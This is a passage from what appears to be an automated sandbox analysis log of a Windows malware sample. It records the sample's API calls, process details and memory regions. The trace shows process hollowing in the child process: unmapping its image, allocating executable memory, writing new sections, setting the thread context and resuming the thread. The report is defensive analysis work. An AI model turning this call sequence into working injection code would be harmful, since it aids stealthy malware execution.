[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x4984b0, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0071.679] ReadProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x18e200, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x18e200*, lpNumberOfBytesRead=0x0) returned 1 [0071.679] NtUnmapViewOfSection (ProcessHandle=0x78, BaseAddress=0x400000) returned 0x0 [0071.796] VirtualAllocEx (hProcess=0x78, lpAddress=0x400000, dwSize=0x137000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0071.806] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x400000, Buffer=0x3db15a0*, NumberOfBytesToWrite=0x400, NumberOfBytesWritten=0x0 | out: Buffer=0x3db15a0*, NumberOfBytesWritten=0x0) returned 0x0 [0071.839] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x401000, Buffer=0x3db19a0*, NumberOfBytesToWrite=0xca600, NumberOfBytesWritten=0x0 | out: Buffer=0x3db19a0*, NumberOfBytesWritten=0x0) returned 0x0 [0071.890] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x4cc000, Buffer=0x3e7bfa0*, NumberOfBytesToWrite=0x3dc00, NumberOfBytesWritten=0x0 | out: Buffer=0x3e7bfa0*, NumberOfBytesWritten=0x0) returned 0x0 [0071.919] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x50a000, Buffer=0x3eb9ba0*, NumberOfBytesToWrite=0x6400, NumberOfBytesWritten=0x0 | out: Buffer=0x3eb9ba0*, NumberOfBytesWritten=0x0) returned 0x0 [0071.940] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52b000, Buffer=0x3ebffa0*, NumberOfBytesToWrite=0x200, NumberOfBytesWritten=0x0 | out: Buffer=0x3ebffa0*, NumberOfBytesWritten=0x0) returned 0x0 [0071.960] NtWriteVirtualMemory (in: ProcessHandle=0x78, BaseAddress=0x52c000, Buffer=0x3ec01a0*, NumberOfBytesToWrite=0xa400, NumberOfBytesWritten=0x0 | out: Buffer=0x3ec01a0*, NumberOfBytesWritten=0x0) returned 0x0 [0071.980] WriteProcessMemory (in: hProcess=0x78, lpBaseAddress=0x7efde008, lpBuffer=0x3db16ec*, nSize=0x4, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x3db16ec*, lpNumberOfBytesWritten=0x0) returned 1 [0071.981] SetThreadContext (hThread=0x74, lpContext=0x2b0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x424141, Ebp=0x0, Eip=0x76f101c4, SegCs=0x23, EFlags=0x202, Esp=0x18fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0071.982] ResumeThread (hThread=0x74) returned 0x1 [0072.184] CloseHandle (hObject=0x74) returned 1 [0072.185] CloseHandle (hObject=0x78) returned 1 [0072.185] ExitProcess (uExitCode=0x0) [0072.185] HeapFree (in: hHeap=0x3f80000, dwFlags=0x0, lpMem=0x3f807d0 | out: hHeap=0x3f80000) returned 1 Process: id = "2" image_name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" page_root = "0x43380000" os_pid = "0xea0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xe90" cmd_line = "\"C:\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe\" " cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f52a" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 319 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 320 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 321 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 322 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 323 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 324 start_va = 0x190000 end_va = 0x193fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 325 start_va = 0x400000 end_va = 0x253dfff monitored = 1 entry_point = 0x4984b0 region_type = mapped_file name = "0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" filename = "\\Users\\kEecfMwgj\\Desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe" (normalized: "c:\\users\\keecfmwgj\\desktop\\0336cc8aff0e4974ede9e8901abeb10f836d50619cef1cb59aa41b447cea1ca5.exe") Region: id = 326 start_va = 0x76d20000 end_va = 0x76ec8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 327 start_va = 0x76f00000 end_va = 0x7707ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 328 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 329 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 330 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 331 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 332 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 333 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 334 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 335 start_va = 0x400000 end_va = 0x536fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 336 start_va = 0x1a0000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 337 start_va = 0x73690000 end_va = 0x736cefff monitored = 0 entry_point = 0x736be088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 338 start_va = 0x73630000 end_va = 0x7368bfff monitored = 0 entry_point = 0x7366f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 339 start_va = 0x73620000 end_va = 0x73627fff monitored = 0 entry_point = 0x736220f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 340 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 341 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 342 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 0 entry_point = 0x76b15340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 343 start_va = 0x76b00000 end_va = 0x76c1efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076b00000" filename = "" Region: id = 344 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 0 entry_point = 0x76c3a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 345 start_va = 0x76c20000 end_va = 0x76d19fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000076c20000" filename = "" Region: id = 346 start_va = 0x540000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 347 start_va = 0x752b0000 end_va = 0x753bffff monitored = 0 entry_point = 0x752c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 348 start_va = 0x753c0000 end_va = 0x75406fff monitored = 0 entry_point = 0x753c74c1 region_type = mapped_file name = "kernelbase.dll" filename = 